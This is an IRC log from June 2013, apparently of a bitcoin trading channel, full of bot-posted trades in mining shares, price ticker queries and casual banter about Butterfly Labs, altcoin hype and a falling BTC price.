;;google 16.jpg Jun 02 00:30:01 16.jpg | Flickr - Photo Sharing!: ; The Benefits Of Working With 16-Bit Images In Photoshop: ; 16.jpg - IBM: Jun 02 00:30:24 kakobrekla: you know how it is with googling numbers :D Jun 02 00:30:29 :D Jun 02 00:30:51 myea those preggies. Jun 02 00:31:05 run the world Jun 02 00:31:18 [HAVELOCK] [ASICM] 39 @ 0.0242 = 0.9438 BTC [-] Jun 02 00:31:39 lol Jun 02 00:34:04 mircea_popescu: LOL Jun 02 00:36:26 was talking to a friend about btc deflation, and he showed me some transactions from a couple years back buying socks for 8btc and some bacon strips for 3btc, lmfao Jun 02 00:36:52 :p Jun 02 00:36:54 this takes the cake Jun 02 00:43:13 lol bacon for 400 dollars Jun 02 00:43:16 expensive bacon Jun 02 00:44:21 kakobrekla: java or no java? Jun 02 00:44:48 depends Jun 02 00:45:09 that's bacon from civet cat Jun 02 00:45:18 coffeinated :D Jun 02 00:45:36 yeah and i paid 500 btc for 5k e car Jun 02 00:45:39 5btc for a domain Jun 02 00:45:42 etc etc Jun 02 00:46:33 great money managment skillz Jun 02 00:46:36 anyone wanna vest? Jun 02 00:47:28 you mean piece of clothing? Jun 02 00:47:39 [BTCTC] [BASIC-MINING] 2 @ 0.69 = 1.38 BTC [+] Jun 02 00:48:52 [BTCTC] [TAT.ASICMINER] 15 @ 0.024899 = 0.3735 BTC [+] Jun 02 00:54:50 [HAVELOCK] [ASICM] 1 @ 0.02459999 BTC [+] Jun 02 00:55:38 ;;nethash Jun 02 00:55:46 115476.696879 Jun 02 00:55:50 niiiice Jun 02 00:56:22 ;;estimate Jun 02 00:56:23 Next difficulty estimate | 14685974.4689 based on data since last change | 16131662.0434 based on data for last three days Jun 02 00:56:26 [HAVELOCK] [ASICM] 124 @ 0.02459999 = 3.0504 BTC [+] Jun 02 00:56:57 ;;bc,stats Jun 02 00:56:58 Current Blocks: 239143 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 760 blocks | Next Difficulty In About: 3 days, 17 hours, 51 minutes, and 7 seconds | Next Difficulty Estimate: 14685974.4689 | Estimated Percent Change: 20.83829 Jun 02 00:57:45 [HAVELOCK] [ASICM] 50 @ 0.02459999 = 1.23 BTC [+] Jun 02 00:59:45 >There are a lot of guys jumping all over all these new currency's everyday just to make a quick profit. Those guys we are not concerned about. The part of the community that we are concerned with is the true supporters of PXC. We are long term thinking business men. We have a game plan and we are sticking to it. Those who join us on our journey will profit nicely. Those who mine a little bit just to flip to to make a couple of dollars wil Jun 02 00:59:45 back kick there self's in the ass. We have $xxx,xxx amount to invest into PXC and all the time we need. The alt crypto wars have started! Jun 02 00:59:53 sauce https://bitcointalk.org/index.php?topic=211165.msg2343144#msg2343144 Jun 02 01:01:35 YEAH Jun 02 01:02:13 "And you have my hashes, John." Jun 02 01:05:45 still a problem https://bitcointalk.org/index.php?topic=222911.msg2343689#msg2343689 Jun 02 01:08:42 pxc ? Jun 02 01:08:59 omg phenixcoin or smth where have you been Jun 02 01:10:23 dude i was afk getting a bj. Jun 02 01:11:17 [MPEX] [S.MPOE] 4321 @ 0.0007212 = 3.1163 BTC [+] Jun 02 01:11:19 [MPEX] [S.MPOE] 4629 @ 0.00072103 = 3.3376 BTC [-] Jun 02 01:28:18 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [+] Jun 02 01:36:10 [HAVELOCK] [VTX] 1 @ 0.422 BTC [-] Jun 02 01:42:16 https://forums.butterflylabs.com/announcements/3014-butterfly-labs-announces-bulk-chip-sales.html Jun 02 01:43:52 sigh, yet another scam Jun 02 01:44:05 scammin erryday Jun 02 01:44:11 BFL by Supa™ Jun 02 01:44:56 14-week turn Jun 02 01:45:30 [HAVELOCK] [SDICE] 1 @ 0.2151 BTC [-] Jun 02 01:45:32 [HAVELOCK] [SDICE] 4 @ 0.215 = 0.86 BTC [-] Jun 02 01:45:51 6.6x more expensive than Avalon Jun 02 01:46:05 for the lowest grade they sell Jun 02 01:46:06 lol bfl by supa Jun 02 01:46:16 ThickAsThieves 14 week what ? Jun 02 01:46:20 what happened to twoweeks Jun 02 01:46:25 100 days to deliver Jun 02 01:46:32 2 weeks was to much upkeep Jun 02 01:46:38 100 days is way easier Jun 02 01:46:40 :) Jun 02 01:46:45 Grade D: 13 Engines or less - $83/chip Jun 02 01:46:46 too* Jun 02 01:46:47 cute. Jun 02 01:46:59 so 2 engine chips ? Jun 02 01:47:23 [HAVELOCK] [ASICM] 2 @ 0.024575 = 0.0492 BTC [-] Jun 02 01:48:04 22:46 < mircea_popescu> what happened to twoweeks Jun 02 01:48:05 lmfao Jun 02 01:50:21 100,000 or more - 20% discount Jun 02 01:50:23 wait what. Jun 02 01:50:39 these doods seriously imagine somebody's blowing a million dollars on their nonsens ?! Jun 02 01:54:59 lol really? BFL chip sales? Jun 02 01:55:44 why the fuck don't they just start shipping their own product Jun 02 01:55:48 it all depends on what you mean by really. Jun 02 02:00:49 "really" as in "sigh, the saga continues…" Jun 02 02:01:12 [HAVELOCK] [ASICM] 31 @ 0.0246 = 0.7626 BTC [+] Jun 02 02:02:34 butterfly labs is indeed shipping call them a scam if you want, maybe you missed the boat, idk..but my friend has some of their hardware i checked it out Jun 02 02:02:46 [BTCTC] [BASIC-MINING] 3 @ 0.689 = 2.067 BTC [-] Jun 02 02:03:10 [BTCTC] [ASICMINER-PT] 6 @ 2.457501 = 14.745 BTC [-] Jun 02 02:06:42 KRS-1 100k chips ? Jun 02 02:12:01 [BTCTC] [TAT.ASICMINER] 34 @ 0.024799 = 0.8432 BTC [-] Jun 02 02:14:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] Jun 02 02:14:48 [BTCTC] [ASICMINER-PT] 2 @ 2.474 = 4.948 BTC [+] Jun 02 02:14:54 [BTCTC] [TAT.ASICMINER] 6 @ 0.024799 = 0.1488 BTC [-] Jun 02 02:20:19 [HAVELOCK] [ASICM] 4 @ 0.0246 = 0.0984 BTC [+] Jun 02 02:22:42 [HAVELOCK] [ASICM] 38 @ 0.024575 = 0.9339 BTC [-] Jun 02 02:23:20 [MPEX] [S.MPOE] 5845 @ 0.00072103 = 4.2144 BTC [-] Jun 02 02:26:16 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [-] Jun 02 02:26:59 [BTCTC] [TAT.ASICMINER] 21 @ 0.024513 = 0.5148 BTC [-] Jun 02 02:27:10 [BTCTC] [ASICMINER-PT] 5 @ 2.474 = 12.37 BTC [+] Jun 02 02:28:23 [BTCTC] [BASIC-MINING] 2 @ 0.689 = 1.378 BTC [-] Jun 02 02:28:25 [BTCTC] [BASIC-MINING] 2 @ 0.69 = 1.38 BTC [+] Jun 02 02:28:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.024513 = 0.0981 BTC [-] Jun 02 02:29:35 [BTCTC] [TAT.ASICMINER] 25 @ 0.02464 = 0.616 BTC [+] Jun 02 02:29:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.02465 = 0.1479 BTC [+] Jun 02 02:30:10 [BTCTC] [TAT.ASICMINER] 30 @ 0.024512 = 0.7354 BTC [-] Jun 02 02:30:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.024512 = 0.0735 BTC [-] Jun 02 02:30:21 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jun 02 02:41:49 [BTCTC] [BITVPS] 1 @ 0.000721 BTC [-] Jun 02 02:44:51 [MPEX] [S.MPOE] 321 @ 0.00071943 = 0.2309 BTC [-] Jun 02 02:44:53 [MPEX] [S.MPOE] 11500 @ 0.00071942 = 8.2733 BTC [-] Jun 02 02:45:01 [MPEX] [S.MPOE] 3029 @ 0.00071786 = 2.1744 BTC [-] Jun 02 02:46:46 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [-] Jun 02 02:49:30 [BTCTC] [ASICMINER-PT] 3 @ 2.474 = 7.422 BTC [+] Jun 02 02:52:15 [BTCTC] [ASICMINER-PT] 2 @ 2.474 = 4.948 BTC [+] Jun 02 02:52:19 [BTCTC] [ASICMINER-PT] 11 @ 2.475 = 27.225 BTC [+] Jun 02 02:53:36 [BTCTC] [ASICMINER-PT] 7 @ 2.47999 = 17.3599 BTC [+] Jun 02 02:55:04 [MPEX] [S.MPOE] 3755 @ 0.0007199 = 2.7032 BTC [+] Jun 02 02:55:05 [MPEX] [S.MPOE] 2903 @ 0.00072155 = 2.0947 BTC [+] Jun 02 03:00:12 [BTCTC] [ASICMINER-PT] 13 @ 2.47999 = 32.2399 BTC [+] Jun 02 03:00:17 [BTCTC] [ASICMINER-PT] 5 @ 2.48 = 12.4 BTC [+] Jun 02 03:03:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.02472 = 0.0494 BTC [+] Jun 02 03:04:40 [BTCTC] [BITVPS] 19 @ 0.000721 = 0.0137 BTC [-] Jun 02 03:04:42 [BTCTC] [BITVPS] 81 @ 0.000722 = 0.0585 BTC [+] Jun 02 03:04:59 [BTCTC] [TAT.ASICMINER] 8 @ 0.02472 = 0.1978 BTC [+] Jun 02 03:06:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.02472 = 0.4944 BTC [+] Jun 02 03:19:53 [BTCTC] [TAT.ASICMINER] 17 @ 0.02472 = 0.4202 BTC [+] Jun 02 03:22:53 No thanks, thats a lot of chips. Besides I already ate. Jun 02 03:32:03 [BTCTC] [ASICMINER-PT] 2 @ 2.479 = 4.958 BTC [-] Jun 02 03:46:13 [BTCTC] [TAT.ASICMINER] 20 @ 0.02432 = 0.4864 BTC [-] Jun 02 03:46:15 [BTCTC] [TAT.ASICMINER] 54 @ 0.02432 = 1.3133 BTC [-] Jun 02 03:47:17 [HAVELOCK] [ASICM] 30 @ 0.02459999 = 0.738 BTC [+] Jun 02 03:49:06 [BTCTC] [ASICMINER-PT] 1 @ 2.479 BTC [-] Jun 02 03:57:52 [BTCTC] [ASICMINER-PT] 1 @ 2.479 BTC [-] Jun 02 03:59:21 [BTCTC] [TAT.ASICMINER] 20 @ 0.024351 = 0.487 BTC [+] Jun 02 04:00:20 [BTCTC] [BASIC-MINING] 4 @ 0.69 = 2.76 BTC [+] Jun 02 04:02:23 [HAVELOCK] [ASICM] 206 @ 0.02420001 = 4.9852 BTC [-] Jun 02 04:03:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.024719 = 0.4944 BTC [+] Jun 02 04:04:23 [BTCTC] [ASICMINER-PT] 1 @ 2.479 BTC [-] Jun 02 04:18:22 this is ridiculous somebody do something Jun 02 04:23:11 ? Jun 02 04:26:32 KRS-1: what Jun 02 04:32:43 ;;ticker Jun 02 04:32:44 BTCUSD ticker | Best bid: 128.06501, Best ask: 128.99999, Bid-ask spread: 0.93498, Last trade: 129.00000, 24 hour volume: 6714.52403706, 24 hour low: 127.10001, 24 hour high: 129.40002, 24 hour vwap: 128.39371 Jun 02 04:34:47 ;;ticker -vol Jun 02 04:34:47 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a (1 more message) Jun 02 04:34:56 ;;ticker --vol Jun 02 04:34:57 6714.74055022 Jun 02 04:35:10 i think thats qhat krs iw worried about Jun 02 04:35:12 [BTCTC] [ASICMINER-PT] 1 @ 2.479 BTC [-] Jun 02 04:36:01 why ? Jun 02 04:36:09 he is short Jun 02 04:36:41 meanwhile, https://bitcointalk.org/index.php?topic=129461.msg2342967#msg2342967 Jun 02 04:37:37 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [-] Jun 02 04:37:44 $proxies Jun 02 04:37:45 cole_albon: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://mpex6.coinbr.com"] Jun 02 04:37:57 [MPEX] [S.MPOE] 4500 @ 0.00071786 = 3.2304 BTC [-] Jun 02 04:38:04 $proxies Jun 02 04:38:05 cole_albon: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://mpex6.coinbr.com"] Jun 02 04:42:10 [HAVELOCK] [VTX] 8 @ 0.422 = 3.376 BTC [-] Jun 02 05:06:18 [BTCTC] [BASIC-MINING] 3 @ 0.69 = 2.07 BTC [+] Jun 02 05:06:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.024684 = 0.4937 BTC [-] Jun 02 05:07:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.024684 BTC [-] Jun 02 05:07:25 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jun 02 05:10:28 [BTCTC] [TAT.ASICMINER] 37 @ 0.024684 = 0.9133 BTC [-] **** BEGIN LOGGING AT Sun Jun 2 16:08:57 2013 Jun 02 16:10:30 [BTCTC] [TAT.ASICMINER] 25 @ 0.02435 = 0.6088 BTC [+] Jun 02 16:11:48 [BTCTC] [ASICMINER-PT] 2 @ 2.44 = 4.88 BTC [-] Jun 02 16:11:51 [BTCTC] [ASICMINER-PT] 1 @ 2.436026 BTC [-] Jun 02 16:11:53 [BTCTC] [ASICMINER-PT] 1 @ 2.436025 BTC [-] Jun 02 16:15:20 ;;ticker Jun 02 16:15:22 BTCUSD ticker | Best bid: 120.40001, Best ask: 120.50000, Bid-ask spread: 0.09999, Last trade: 120.40000, 24 hour volume: 70638.45360456, 24 hour low: 118.89853, 24 hour high: 130.10000, 24 hour vwap: 124.08988 Jun 02 16:23:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.02435 = 0.0487 BTC [+] Jun 02 16:25:32 [BTCTC] [TAT.ASICMINER] 9 @ 0.02435 = 0.2192 BTC [+] Jun 02 16:32:15 [BTCTC] [TAT.ASICMINER] 41 @ 0.02435 = 0.9984 BTC [+] Jun 02 16:42:22 [HAVELOCK] [ASICM] 10 @ 0.02449999 = 0.245 BTC [-] Jun 02 16:54:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.0243 = 0.3645 BTC [-] Jun 02 16:54:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.0243 = 0.0486 BTC [-] Jun 02 16:58:48 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1806 = 0.3612 BTC [-] Jun 02 16:59:23 ;;bids 0 Jun 02 16:59:31 There are currently 13050530 bitcoins demanded at or over 0.0 USD, worth 14337926.4659 USD in total. | Data vintage: 0.0522 seconds Jun 02 16:59:43 ;;asks 111111111111111111111 Jun 02 16:59:43 There are currently 112704.93 bitcoins offered at or under 1.11111111111e+20 USD, worth 1.41048449375e+13 USD in total. | Data vintage: 12.7761 seconds Jun 02 17:03:29 [BTCTC] [TAT.ASICMINER] 41 @ 0.0241 = 0.9881 BTC [-] Jun 02 17:03:31 [BTCTC] [TAT.ASICMINER] 100 @ 0.0241 = 2.41 BTC [-] Jun 02 17:03:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.02401 = 0.2401 BTC [-] Jun 02 17:03:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.024002 = 0.096 BTC [-] Jun 02 17:03:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.024001 = 0.072 BTC [-] Jun 02 17:03:40 [BTCTC] [TAT.ASICMINER] 53 @ 0.024 = 1.272 BTC [-] Jun 02 17:03:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] Jun 02 17:03:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.0239 = 0.478 BTC [-] Jun 02 17:03:46 [BTCTC] [TAT.ASICMINER] 25 @ 0.0239 = 0.5975 BTC [-] Jun 02 17:03:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.0239 = 0.0478 BTC [-] Jun 02 17:03:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.023899 BTC [-] Jun 02 17:03:52 [BTCTC] [TAT.ASICMINER] 37 @ 0.02382 = 0.8813 BTC [-] Jun 02 17:03:55 [BTCTC] [TAT.ASICMINER] 12 @ 0.023815 = 0.2858 BTC [-] Jun 02 17:03:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.0238 = 0.238 BTC [-] Jun 02 17:03:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.0237 = 0.0474 BTC [-] Jun 02 17:03:59 [BTCTC] [TAT.ASICMINER] 500 @ 0.0233 = 11.65 BTC [-] Jun 02 17:04:10 [BTCTC] [TAT.ASICMINER] 45 @ 0.023205 = 1.0442 BTC [-] Jun 02 17:04:13 [BTCTC] [TAT.ASICMINER] 35 @ 0.023151 = 0.8103 BTC [-] Jun 02 17:04:15 [BTCTC] [TAT.ASICMINER] 25 @ 0.023004 = 0.5751 BTC [-] Jun 02 17:04:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.022517 BTC [-] Jun 02 17:04:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.022517 = 0.045 BTC [-] Jun 02 17:04:20 [BTCTC] [TAT.ASICMINER] 470 @ 0.0224 = 10.528 BTC [-] Jun 02 17:04:27 nice dumping Jun 02 17:06:30 a few hours late dsfsdfs Jun 02 17:06:45 [BTCTC] [ASICMINER-PT] 1 @ 2.469995 BTC [+] Jun 02 17:06:48 [HAVELOCK] [ASICM] 30 @ 0.02449999 = 0.735 BTC [-] Jun 02 17:06:49 [HAVELOCK] [ASICM] 100 @ 0.0245 = 2.45 BTC [+] Jun 02 17:06:50 [HAVELOCK] [ASICM] 30 @ 0.0245 = 0.735 BTC [+] Jun 02 17:08:49 [BTCTC] [ASICMINER-PT] 2 @ 2.4788 = 4.9576 BTC [+] Jun 02 17:08:51 [BTCTC] [ASICMINER-PT] 10 @ 2.4789 = 24.789 BTC [+] Jun 02 17:09:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.024349 = 0.073 BTC [+] Jun 02 17:15:49 [HAVELOCK] [ASICM] 78 @ 0.0244 = 1.9032 BTC [-] Jun 02 17:25:56 [BTCTC] [TAT.ASICMINER] 17 @ 0.024349 = 0.4139 BTC [+] Jun 02 17:25:59 [BTCTC] [TAT.ASICMINER] 423 @ 0.02435 = 10.3001 BTC [+] Jun 02 17:32:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.024499 BTC [+] Jun 02 17:33:44 [HAVELOCK] [ASICM] 30 @ 0.024121 = 0.7236 BTC [-] Jun 02 17:34:07 [HAVELOCK] [ASICM] 10 @ 0.02412 = 0.2412 BTC [-] Jun 02 17:34:36 [HAVELOCK] [ASICM] 1 @ 0.024111 BTC [-] Jun 02 17:34:38 [HAVELOCK] [ASICM] 2 @ 0.02411 = 0.0482 BTC [-] Jun 02 17:34:56 [HAVELOCK] [ASICM] 1 @ 0.02411 BTC [-] Jun 02 17:35:19 [HAVELOCK] [ASICM] 10 @ 0.0241 = 0.241 BTC [-] Jun 02 17:36:40 [MPEX] [S.MPOE] 2407 @ 0.0007198 = 1.7326 BTC [-] Jun 02 17:36:42 [MPEX] [S.MPOE] 2793 @ 0.00071976 = 2.0103 BTC [-] Jun 02 17:36:48 [BTCTC] [BTC-BOND] 32 @ 0.00999 = 0.3197 BTC [-] Jun 02 17:38:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [+] Jun 02 17:38:49 [BTCTC] [TAT.ASICMINER] 162 @ 0.024499 = 3.9688 BTC [-] Jun 02 17:39:06 [BTCTC] [BITVPS] 1 @ 0.000925 BTC [-] Jun 02 17:39:38 [HAVELOCK] [ASICM] 10 @ 0.024399 = 0.244 BTC [+] Jun 02 17:44:48 [HAVELOCK] [ASICM] 10 @ 0.02411 = 0.2411 BTC [-] Jun 02 17:45:35 [HAVELOCK] [ASICM] 10 @ 0.02411 = 0.2411 BTC [-] Jun 02 17:47:34 ;;ticker Jun 02 17:47:35 BTCUSD ticker | Best bid: 122.19100, Best ask: 122.90000, Bid-ask spread: 0.70900, Last trade: 122.89999, 24 hour volume: 72425.03475354, 24 hour low: 118.89853, 24 hour high: 130.10000, 24 hour vwap: 124.00856 Jun 02 17:50:18 [MPEX] [S.MPOE] 314 @ 0.00071998 = 0.2261 BTC [+] Jun 02 17:50:23 [MPEX] [S.MPOE] 1686 @ 0.00071976 = 1.2135 BTC [-] Jun 02 17:50:25 [HAVELOCK] [SDICE] 1 @ 0.2341 BTC [+] Jun 02 17:50:26 [HAVELOCK] [SDICE] 9 @ 0.2342 = 2.1078 BTC [+] Jun 02 17:52:37 [BTCTC] [BITVPS] 27 @ 0.0008 = 0.0216 BTC [-] Jun 02 17:54:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.024698 = 0.0741 BTC [+] Jun 02 17:55:47 IPO will go live in about an hour, early bidding is open: https://bitfunder.com/asset/TAT.VIRTUALMINE Jun 02 17:57:06 [BTCTC] [BITVPS] 1 @ 0.000771 BTC [-] Jun 02 17:59:46 ;;ticker Jun 02 17:59:48 BTCUSD ticker | Best bid: 118.91320, Best ask: 118.95000, Bid-ask spread: 0.03680, Last trade: 118.95000, 24 hour volume: 75305.46242744, 24 hour low: 118.89853, 24 hour high: 130.10000, 24 hour vwap: 123.83589 Jun 02 18:00:07 ;;bids 105 Jun 02 18:00:08 There are currently 31688.634 bitcoins demanded at or over 105.0 USD, worth 3539727.08939 USD in total. | Data vintage: 117.7869 seconds Jun 02 18:00:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.024697 = 0.0494 BTC [-] Jun 02 18:09:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.024696 = 0.1235 BTC [-] Jun 02 18:09:48 [BTCTC] [TAT.ASICMINER] 6 @ 0.024696 = 0.1482 BTC [-] Jun 02 18:14:29 ;;ticker Jun 02 18:14:31 BTCUSD ticker | Best bid: 119.67518, Best ask: 119.67999, Bid-ask spread: 0.00481, Last trade: 119.67518, 24 hour volume: 78994.42456778, 24 hour low: 117.50000, 24 hour high: 130.10000, 24 hour vwap: 123.58827 Jun 02 18:14:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.024351 = 0.0731 BTC [-] Jun 02 18:16:13 ;;ticker Jun 02 18:16:14 BTCUSD ticker | Best bid: 115.84561, Best ask: 115.85001, Bid-ask spread: 0.00440, Last trade: 115.85001, 24 hour volume: 82366.94374675, 24 hour low: 115.85001, 24 hour high: 130.10000, 24 hour vwap: 123.29843 Jun 02 18:16:32 yeesh Jun 02 18:16:54 ;;ticker Jun 02 18:16:54 BTCUSD ticker | Best bid: 115.83458, Best ask: 116.00000, Bid-ask spread: 0.16542, Last trade: 116.01468, 24 hour volume: 82403.02126006, 24 hour low: 115.85001, 24 hour high: 130.10000, 24 hour vwap: 123.29520 Jun 02 18:17:30 Wheee! Sadly, due to moving expenses, I don't have any freely available fiat to buy. Jun 02 18:19:39 where da bulls at Jun 02 18:20:44 https://www.youtube.com/watch?v=NoBFhdeR9PE Jun 02 18:26:15 [HAVELOCK] [ASICM] 2 @ 0.0241 = 0.0482 BTC [-] Jun 02 18:26:37 There be no bulls here my friend. Jun 02 18:27:01 http://sd.keepcalm-o-matic.co.uk/i/keep-calm-and-sell-your-bitcoins.png Jun 02 18:27:31 i'll be happy to see cheap coins !! Jun 02 18:30:08 Sub 100 would be great. I'd risk my moving expenses to get in at that level. Jun 02 18:33:28 i see a buy wall at $115 it will hold there i think Jun 02 18:33:48 getting eaten Jun 02 18:33:50 that was a lot of volume Jun 02 18:34:09 coinbase only lets me buy 10! :( Jun 02 18:34:23 i like coinbase Jun 02 18:34:33 interface i mean Jun 02 18:39:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.02455 = 0.0982 BTC [+] Jun 02 18:40:07 hehe Jun 02 18:40:15 it's not for people like you no Jun 02 18:40:21 unless you wanna try and flip it Jun 02 18:41:34 [BTCTC] [S.DICE-PT] 2 @ 0.0025 = 0.005 BTC [-] Jun 02 18:41:36 although, don't you invest in cognitive? Jun 02 18:42:11 his asset is at 0.02336 per MH/s Jun 02 18:45:58 when is this going to stop Jun 02 18:46:00 but it's speculation on future hardware, right? Jun 02 18:47:15 eric, it is and it isn't Jun 02 18:47:39 reinvestment in hardware must be done very prudently Jun 02 18:47:50 to actually stay afloat above mining diff increases Jun 02 18:48:01 and to be better than just holding coins Jun 02 18:48:25 right and they are valuing it at 0.02336 per mh/s because they speculate they will see much better mh/s with hardware reinvestment "coming" Jun 02 18:48:34 or they want to ride the ups and downs Jun 02 18:51:59 what's funny is that the assets that are speculating the heaviest on new equipment Jun 02 18:52:02 like AMC Jun 02 18:52:12 actually have the lowest costs Jun 02 18:52:16 per share Jun 02 18:52:22 hope sells for more than reality Jun 02 18:52:54 [HAVELOCK] [ASICM] 1 @ 0.0243989 BTC [+] Jun 02 18:52:57 somebody said the drop is just beginning wtf Jun 02 18:53:16 a good drop will really help the asset market Jun 02 18:53:55 sucks tho if you have any inclination to lose faith in BTC Jun 02 18:54:52 [HAVELOCK] [ASICM] 1 @ 0.0243989 BTC [+] Jun 02 18:56:21 AMC has 100 mil shares o.o something like a 7 million dollars. more like crazy Jun 02 18:58:38 AMC is a mess. There really aren't any prettier ways to say it. Jun 02 19:00:08 [HAVELOCK] [ASICM] 1 @ 0.02435 BTC [-] Jun 02 19:00:37 http://lmgtfy.com/?q=amc+bitcoin Jun 02 19:02:11 We're live! https://bitfunder.com/asset/TAT.VIRTUALMINE Jun 02 19:03:14 he already pooped on my thread a little Jun 02 19:04:12 wheres the ipo Jun 02 19:04:41 someones already trying to flip 13k hehe Jun 02 19:05:12 KRS-1: https://bitfunder.com/asset/TAT.VIRTUALMINE Jun 02 19:05:13 [BTCTC] [BASIC-MINING] 1 @ 0.670101 BTC [-] Jun 02 19:05:17 [BTCTC] [BASIC-MINING] 1 @ 0.6701 BTC [-] Jun 02 19:05:21 [BTCTC] [BASIC-MINING] 4 @ 0.67 = 2.68 BTC [-] Jun 02 19:06:00 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [-] Jun 02 19:08:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02436 BTC [-] Jun 02 19:08:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.02435 = 0.0487 BTC [-] Jun 02 19:08:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.024349 = 0.2435 BTC [-] Jun 02 19:08:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] Jun 02 19:09:30 win 25 Jun 02 19:10:27 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [-] Jun 02 19:10:33 [BTCTC] [BASIC-MINING] 3 @ 0.67 = 2.01 BTC [-] Jun 02 19:12:10 whats that 3d casino again Jun 02 19:12:13 bitcoin game Jun 02 19:12:14 i forgot Jun 02 19:12:34 bitvegas Jun 02 19:13:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.0245 = 0.1225 BTC [+] Jun 02 19:14:38 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Jun 02 19:15:05 [BTCTC] [TAT.ASICMINER] 95 @ 0.0245 = 2.3275 BTC [+] Jun 02 19:21:21 [HAVELOCK] [ASICM] 8 @ 0.0243989 = 0.1952 BTC [+] Jun 02 19:21:27 [HAVELOCK] [ASICM] 1 @ 0.024399 BTC [+] Jun 02 19:21:34 [HAVELOCK] [ASICM] 30 @ 0.0243999 = 0.732 BTC [+] Jun 02 19:21:41 [HAVELOCK] [ASICM] 100 @ 0.02439999 = 2.44 BTC [+] Jun 02 19:21:55 [HAVELOCK] [ASICM] 422 @ 0.0244 = 10.2968 BTC [+] Jun 02 19:21:57 [HAVELOCK] [ASICM] 15 @ 0.0244 = 0.366 BTC [+] Jun 02 19:27:22 http://bitcoinviews.com/exclusive-ig-group-to-can-bitcoin-binary-options/ .. so they used it just as a gimmick Jun 02 19:27:40 [MPEX] [S.MPOE] 2300 @ 0.00072162 = 1.6597 BTC [+] Jun 02 19:29:00 [BTCTC] [ASICMINER-PT] 2 @ 2.47 = 4.94 BTC [+] Jun 02 19:29:59 ThickAsThieves: you really can't give utc times?i had minor mindfuck from the combination of murican timezone and pm suffix Jun 02 19:30:30 sorry Jun 02 19:30:53 I'm American, all systems of measurement revolve around us, haven't you heard? Jun 02 19:30:56 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] Jun 02 19:30:58 [BTCTC] [ASICMINER-PT] 2 @ 2.4502 = 4.9004 BTC [-] Jun 02 19:31:15 google said it will be at 6 a.m. here :D Jun 02 19:31:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.024549 BTC [+] Jun 02 19:31:34 but np, i made it Jun 02 19:31:45 istatmenus, never go without it http://o7.no/11bfuOJ Jun 02 19:31:47 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 02 19:32:25 [BTCTC] [ASICMINER-PT] 1 @ 2.4501 BTC [-] Jun 02 19:34:19 [BTCTC] [ASICMINER-PT] 12 @ 2.45 = 29.4 BTC [-] Jun 02 19:34:28 [BTCTC] [ASICMINER-PT] 10 @ 2.45 = 24.5 BTC [-] Jun 02 19:34:48 yeah, kde has something alike too.. but i was not at home Jun 02 19:49:33 [BTCTC] [BITVPS] 332 @ 0.000751 = 0.2493 BTC [-] Jun 02 19:51:57 ericmuyser: heh, i do the same Jun 02 19:53:51 [BTCTC] [BITVPS] 1000 @ 0.00075 = 0.75 BTC [-] Jun 02 19:58:14 mircea_popescu, jurov https://bitcointalk.org/index.php?topic=223626.msg1521109;topicseen#new Jun 02 20:00:23 wow Jun 02 20:00:38 interesting day we're having Jun 02 20:01:07 theymos as arbiter... okay. Jun 02 20:01:37 *waits Jun 02 20:08:30 Chaang-Noi: you're married to a Thai girl? Jun 02 20:08:39 COMPLETELY OFF TOPIC. Jun 02 20:08:39 lol Jun 02 20:09:37 fuck topics Jun 02 20:11:22 ^.^ Jun 02 20:11:29 you bought 